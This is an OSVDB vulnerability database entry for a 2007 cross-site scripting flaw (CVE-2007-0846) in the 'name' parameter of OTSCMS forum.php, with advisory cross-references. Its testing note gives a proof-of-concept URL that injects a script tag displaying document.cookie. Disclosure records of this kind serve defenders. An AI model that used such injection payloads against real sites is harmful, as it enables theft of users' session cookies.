OTSCMS forum.php name Variable XSS

2007-02-07T10:48:45
ID OSVDB:33170
Type osvdb
Reporter OSVDB
Modified 2007-02-07T10:48:45

Description

Manual Testing Notes

http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>

References:

Secunia Advisory ID:24116 Related OSVDB ID: 33169 Other Advisory URL: http://milw0rm.com/exploits/3283 ISS X-Force ID: 32324 CVE-2007-0846 Bugtraq ID: 22450